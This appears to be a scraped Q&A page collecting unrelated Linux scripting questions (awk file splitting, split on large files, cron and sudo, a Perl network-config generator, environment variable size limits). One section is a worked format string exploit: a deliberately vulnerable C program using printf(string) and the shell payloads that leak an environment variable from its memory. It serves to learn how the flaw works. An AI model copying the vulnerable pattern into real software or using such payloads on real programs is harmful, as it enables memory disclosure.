Problems with a splitting text script - text

I want to split one big text document (.txt) into multiple ones. The text document is a bunch of debates in the Spanish parliament. The text is divided into policy initiatives (I'm not sure if that is idiomatic) and I want to split it into a document per initiative. The funny thing is that each initiative has its own title in the next form:
- DEL GRUPO PARLAMENTARIO CATALÁN (CONVERGÈNCIA I UNIÓ), REGULADORA DE LOS HORARIOS COMERCIALES. (Número de expediente 122/000004.)
- DEL DIPUTADO DON MARIANO RAJOY BREY, DEL GRUPO PARLAMENTARIO POPULAR EN EL CONGRESO, QUE FORMULA AL SEÑOR PRESIDENTE DEL GOBIERNO: ¿CÓMO VALORA USTED LOS PRIMEROS DÍAS DE SU GOBIERNO? (Número de expediente 180/000021.)
As you can see, every title is in upper case, it starts with a minus and ends with "XXX/XXXXXX.)" (where X is a digit), a dot and a close parenthesis. Every title is different from each other. I have though making some RegEx to capture those characteristics in order to have a delimiter element between those debate.
The ideal would be to select the title and the debate below it until another title appears and make a new document with that, so in the end I can have in a single document the policy initiative with its title and its own debate. Thanks to this community I've got a functional script:
awk '/^-.+[0-9]{3}\/[0-9]{6}\.\)$/ {
if (p) close (p)
p = sprintf("split%05i.txt", ++i) }
{ if (p) print > "p" }' inputfile.txt
But when I run it (with Cygwin in W10) nothing happens. I thought it was due to a Windows configuration problem or something like that, but I just tried in a Ubuntu VM and same happens, i.e., nothing happens:
$ ls -l
total 228
-rw-rw-r-- 1 ubuntu ubuntu 219166 Jan 30 11:28 tryme.txt
-rwxr-xr-x 1 ubuntu ubuntu 8259 Jan 30 11:24 ubiquity.desktop
$ awk '/^-.+[0-9]{3}\/[0-9]{6}\.\)$/ {
if (p) close (p)
p = sprintf("split%05i.txt", ++i) }
{ if (p) print > "p" }' tryme.txt
$ ls -l
total 228
-rw-rw-r-- 1 ubuntu ubuntu 219166 Jan 30 11:28 tryme.txt
-rwxr-xr-x 1 ubuntu ubuntu 8259 Jan 30 11:24 ubiquity.desktop
Any idea about what is happening here? Thank you very much.

Related

Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that I put my test variable and get its address. Then I pass it to the program as a parameter and I add a bunch of format in order to read from them:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ /getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of both the python one-liner and printf (with an extra '%' due to the way the second printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou)
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' wont work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.

Why linux split program have weird behavior with large files >20GB?

I'm doing the next statement on my ubuntu:
split --number=l/5 /pathToSource.csv /pathToOutputDirectory
If i do a "ls"
myUser#serverNAme:/pathToOutputDirectory> ls -la
total 21467452
drwxr-xr-x 2 myUser group 4096 Jun 23 08:51 .
drwxrwxrwx 4 myUser group 4096 Jun 23 08:44 ..
-rw-r--r-- 1 myUser group 10353843231 Jun 23 08:48 aa
-rw-r--r-- 1 myUser group 0 Jun 23 08:48 ab
-rw-r--r-- 1 myUser group 11376663825 Jun 23 08:51 ac
-rw-r--r-- 1 myUser group 0 Jun 23 08:51 ad
-rw-r--r-- 1 myUser group 252141913 Jun 23 08:51 ae
If i do a "du" over ab and ad files.
$du -h ab ad
0 ab
0 ad
As you can see, split divided the file in a non-homogeneous form.
Anyone know what's going on?
Some unprintable character can hang the split?
Thank you.
Best Regards!
Francisco.
While this is unusual data with an average line length of 114137, I'm not sure that fully describes the issue. Hmm you've 21982648969 of data => each bucket that split is trying to fill is 4396529793. That's larger than 2^32. I wonder do we have a 32 bit overflow. Are you on a 32 bit or 64 bit platform? Looking at the code I don't see an overflow issue TBH. Note you could anonymize and compress the data providing the following file for download somewhere:
tr -c '\n' . < /pathToSource.csv | xz > /pathToSource.csv.xz
It's also worth specifying the version since implementation changed a bit between v8.8 and v8.13
A workarround in groovy:
class Sanitizer {
public static void main(String[] args) {
def textOnly = new File('/path/NoDanger.txt')
def data = new File('/path/danger.txt')
String line = null
data.withReader { reader ->
while ( ( line = reader.readLine() ) != null ){
/*char[] stringToCharArray = line.toCharArray();
for(int i = 0; i < 5; i++ ){
char a = stringToCharArray[i]
int b = Character.getNumericValue(a);
println Integer.toHexString(b)
if (!(b =~ /\w/)) {
println "inside"
} else println "outside"
}*/
String newString = line.replaceAll("[^\\p{Print}]", "");
textOnly << newString+"\n"
}
} //reader
}
}

Bash script not producing desired result

I am running a cron-ed bash script to extract cache hits and bytes served per IP address. The script (ProxyUsage.bash) has two parts:
(uniqueIP.awk) find unique IPs and create a bash script do add up the hits and bytes
run the hits and bytes per IP
ProxyUsage.bash
#!/usr/bin/env bash
sudo gawk -f /home/maxg/scripts/uniqueIP.awk /var/log/squid3/access.log.1 > /home/maxg/scripts/pxyUsage.bash
source /home/maxg/scripts/pxyUsage.bash
uniqueIP.awk
{
arrIPs[$3]++;
}
END {
for (n in arrIPs) {
m++; # count arrIPs elements
#print "Array elements: " m;
arrAddr[i++] = n; # fill arrAddr with IPs
#print i " " n;
}
asort(arrAddr); # sort the array values
for (i = 1; i <= m; i++) { # write one command line per IP address
#printf("#!/usr/bin/env bash\n");
printf("sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=%s /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt\n", arrAddr[i])
}
}
pxyUsage.bash
sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=192.168.1.13 /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt
sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=192.168.1.14 /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt
sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=192.168.1.22 /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt
TheProxyUsage.bash script runs as scheduled and creates the pxyUsage.bash script.
However the pxyUsage.text file is not amended with the latest values when the script runs.
So far I run pxyUsage.bash every day myself, as I cannot figure out, why the result is not written to file.
Both bash scripts are set to execute. Actually the file permissions are below:
-rwxr-xr-x 1 maxg maxg 169 Mar 14 08:40 ProxySummary.bash
-rw-r--r-- 1 maxg maxg 910 Mar 15 17:15 proxyUsage.awk
-rwxrwxrwx 1 maxg maxg 399 Mar 17 06:10 pxyUsage.bash
-rw-rw-rw- 1 maxg maxg 2922 Mar 17 07:32 pxyUsage.txt
-rw-r--r-- 1 maxg maxg 781 Mar 16 07:35 uniqueIP.awk
Any hints appreciated. Thanks.
The sudo(8) command requires a pseudo-tty and you do not have one allocated under cron(8); you do have one allocated when logged in the usual way.
Instead of mucking about with sudo(8), just run the script as the correct user.
If you cannot do that, then in the root crontab, do something like this:
su - username /path/to/mycommand arg1 arg2...
This will work because root can use su(1) without neding a password.

linux Bash - read contents of file , store them in a variable and create network config file

I got this file1.csv file which has lots of network interface data (approx 1000) and I have to create the network interface file , as in ifcfg-lo:x files.
the file1.csv file contents as follows:
Hostname Loop_back_ip netmask interface
localhost1 192.168.1.10 255.255.255.255 lo:116
So the script should read the contents from the file1.csv file and create interface file as :
file name = ifcfg-lo:116
File contents :
DEVICE=lo:116
IPADDR=192.168.1.10
NETMASK=255.255.255.255
NETWORK=192.168.1.0
BROADCAST=255.255.255.255
ONBOOT=yes
NAME=loopback
I tried yesterday and I am very close to the solution. Researching the internet , I made a perl script and was able to create multiple interface by extracting data from csv file.
But there is small issue I see and not able to figure out why an extra character is coming in the file.
Following is the code:
#!/usr/bin/perl
use strict;
use warnings;
sub main
{
# Note: this could be a full file path
my $filename = "file1.csv";
open(INPUT, $filename) or die "Cannot open $filename";
# Read the header line.
#my $line = <INPUT>;
my $line;
# Read the lines one by one.
while($line = <INPUT>)
{
chomp($line);
# Display the header, just to check things are working.
my ($hostname, $ip, $netmask, $interface) = split(',', $line);
print "$hostname $ip $netmask $interface\n";
{
if( -d "/var/tmp/$hostname")
{
open(EF, ">/var/tmp/$hostname/ifcfg-$interface") or die "writing /var/tmp/$hostname/ifcfg-$interface\n";
print EF "DEVICE=$interface\n";
print EF "IPADDR=$ip\n";
print EF "NETMASK=$netmask\n";
print EF "NAME=loopback\n";
print EF "BOOTPROTO=none\n";
print EF "TYPE=Ethernet\n";
print EF "ONBOOT=yes\n";
close EF;
}
else
{
system ("mkdir /var/tmp/$hostname");
open(EF, ">/var/tmp/$hostname/ifcfg-$interface") or die "writing /var/tmp/$hostname/ifcfg-$interface\n";
print EF "DEVICE=$interface\n";
print EF "IPADDR=$ip\n";
print EF "NETMASK=$netmask\n";
print EF "NAME=loopback\n";
print EF "BOOTPROTO=none\n";
print EF "TYPE=Ethernet\n";
print EF "ONBOOT=yes\n";
close EF;
}
}
}
close(INPUT);
}
main();
So after executing the script it creates file as :
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:20
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:21
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:22
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:23
When I "cat" the file for display it shows no issues:
$> cat ifcfg-lo:20
DEVICE=lo:20
IPADDR=A.B.C.D
NETMASK=255.255.255.255
NAME=loopback
BOOTPROTO=none
TYPE=Ethernet
ONBOOT=yes
But when I "vi" into the file then I see an extra character ( ^M) and I am able to figure out where it came from and its in every file I created:
$> vi ifcfg-lo:20
DEVICE=lo:20^M
IPADDR=A.B.C.D
NETMASK=255.255.255.255
NAME=loopback
BOOTPROTO=none
TYPE=Ethernet
ONBOOT=yes

What is the maximum size of a Linux environment variable value?

Is there a limit to the amount of data that can be stored in an environment variable on Linux, and if so: what is it?
For Windows, I've found following KB article which summarizes to:
Windows XP or later: 8191 characters
Windows 2000/NT 4.0: 2047 characters
I don't think there is a per-environment variable limit on Linux. The total size of all the environment variables put together is limited at execve() time. See "Limits on size of arguments and environment" here for more information.
A process may use setenv() or putenv() to grow the environment beyond the initial space allocated by exec.
Here's a quick and dirty program that creates a 256 MB environment variable.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(void)
{
size_t size = 1 << 28; /* 256 MB */
char *var;
var = malloc(size);
if (var == NULL) {
perror("malloc");
return 1;
}
memset(var, 'X', size);
var[size - 1] = '\0';
var[0] = 'A';
var[1] = '=';
if (putenv(var) != 0) {
perror("putenv");
return 1;
}
/* Demonstrate E2BIG failure explained by paxdiablo */
execl("/bin/true", "true", (char *)NULL);
perror("execl");
printf("A=%s\n", getenv("A"));
return 0;
}
Well, it's at least 4M on my box. At that point, I got bored and wandered off. Hopefully the terminal output will be finished before I'm back at work on Monday :-)
export b1=A
export b2=$b1$b1
export b4=$b2$b2
export b8=$b4$b4
export b16=$b8$b8
export b32=$b16$b16
export b64=$b32$b32
export b128=$b64$b64
export b256=$b128$b128
export b512=$b256$b256
export b1k=$b512$b512
export b2k=$b1k$b1k
export b4k=$b2k$b2k
export b8k=$b4k$b4k
export b16k=$b8k$b8k
export b32k=$b16k$b16k
export b64k=$b32k$b32k
export b128k=$b64k$b64k
export b256k=$b128k$b128k
export b512k=$b256k$b256k
export b1m=$b512k$b512k
export b2m=$b1m$b1m
export b4m=$b2m$b2m
echo $b4m
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
: : : : : : : : : : : :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
If you're worried that 4M may not be enough for your environment variable, you may want to rethink how you're doing things.
Perhaps it would be a better idea to put the information into a file and then use an environment variable to reference that file. I've seen cases where, if the variable is of the form #/path/to/any/fspec, it gets the actual information from the file path/to/any/fspec. If it doesn't begin with #, it uses the value of the environment variable itself.
Interestingly enough, with all those variables set, every single command starts complaining that the argument list is too long so, even though it lets you set them, it may not be able to start programs after you've done it (since it has to pass the environment to those programs).
Here are two helpful commands:
getconf -a | grep ARG_MAX
true | xargs --show-limits
I did a quick test on my Linux box with the following snippet:
a="1"
while true
do
a=$a$a
echo "$(date) $(numfmt --to=iec-i --suffix=B --padding=7 ${#a})"
done
On my box (Gentoo 3.17.8-gentoo-r1) this results in (last lines of output):
Wed Jan 3 12:16:10 CET 2018 16MiB
Wed Jan 3 12:16:11 CET 2018 32MiB
Wed Jan 3 12:16:12 CET 2018 64MiB
Wed Jan 3 12:16:15 CET 2018 128MiB
Wed Jan 3 12:16:21 CET 2018 256MiB
Wed Jan 3 12:16:33 CET 2018 512MiB
xrealloc: cannot allocate 18446744071562068096 bytes
So: the limit is quite high!
Don't know exactly but a quick experiment shows that no error occurs e.g. with 64kB of value:
% perl -e 'print "#include <stdlib.h>\nint main() { return setenv(\"FOO\", \"", "x"x65536, "\", 1); }\n";'\
| gcc -x c -o envtest - && ./envtest && echo $?
0
I used this very quick and dirty php code (below), modifying it for different values, and found that it works for variable lengths up to 128k. After that, for whatever reason, it doesn't work; no exception is raised, no error is reported, but the value does not show up in the subshell.
Maybe this is a php-specific limit? Maybe there are php.ini settings that might affect it? Or maybe there's a limit on the size of vars that a subshell will inherit? Maybe there are relevant kernel or shell config settings..
Anyway, by default, in CentOS, the limit for setting a var in the environment via putenv in php seems to be about 128k.
<?php
$s = 'abcdefghijklmnop';
$s2 = "";
for ($i = 0; $i < 8100; $i++) $s2 .= $s;
$result = putenv('FOO='.$s2);
print shell_exec('echo \'FOO: \'${FOO}');
print "length of s2: ".strlen($s2)."\n";
print "result = $result\n";
?>
Version info -
[root#localhost scratch]# php --version
PHP 5.2.6 (cli) (built: Dec 2 2008 16:32:08)
<..snip..>
[root#localhost scratch]# uname -a
Linux localhost.localdomain 2.6.18-128.2.1.el5 #1 SMP Tue Jul 14 06:36:37 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[root#localhost scratch]# cat /etc/redhat-release
CentOS release 5.3 (Final)
The command line (with all argument) plus the environment variable should be less then 128k.
In my case it was due to buffer was limited when accepting a variable input value with read command. Solution was to add -e
Before read accessToken
After read -e accessToken
Docs: http://linuxcommand.org/lc3_man_pages/readh.html

Resources